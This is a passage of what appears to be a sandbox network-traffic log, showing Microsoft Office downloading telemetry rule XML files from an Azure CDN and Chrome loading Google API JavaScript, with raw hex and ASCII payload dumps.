47	192.168.2.5	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: fce7b0bb-601e-0050-294b-352c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-1749fc9bdbdqhv2phC1DFWvd3000000001f00000000078ph x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:31 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: a288df0b-b01e-00ab-0601-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-16547b76f7f9bs6dhC1DFWt3rg0000000hh000000000ms1z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:31 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 2d611ff0-901e-002a-3d01-2d7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-16547b76f7fwvr5dhC1DFW2c940000000hh0000000009aa0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:31 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-16547b76f7fp6mhthC1DFWrggn0000000hkg00000000zkfa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:31 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 87bd4a9e-701e-0021-04a0-343d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-1749fc9bdbdb8fs8hC1DFW2b8g00000001eg00000000v1ph x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:31 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: b7b39fa8-701e-000d-7d93-356de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-1749fc9bdbdfj9bwhC1DFWvdqg000000017g00000000mnkb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	49781	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 383f9a6e-f01e-0099-2861-359171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-r178fb8d7657mv58hC1DFW03nw00000001a000000000m3yy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	49782	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-16547b76f7fr28cchC1DFWnuws0000000hpg00000000hwkr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.5	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:31 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:31 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193931Z-16547b76f7f9bs6dhC1DFWt3rg0000000hdg000000011mbn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.5	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:32 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:32 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 28a3e358-d01e-0065-18ab-34b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193932Z-r178fb8d765jv86hhC1DFW8pt000000001m00000000011c8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:32 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49785	216.58.206.46	443	7416	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:32 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-13 19:39:32 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 13 Nov 2024 15:56:45 GMT Expires: Thu, 13 Nov 2025 15:56:45 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 13367 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-13 19:39:32 UTC	463	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-13 19:39:32 UTC	1378	IN	Data Raw: 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 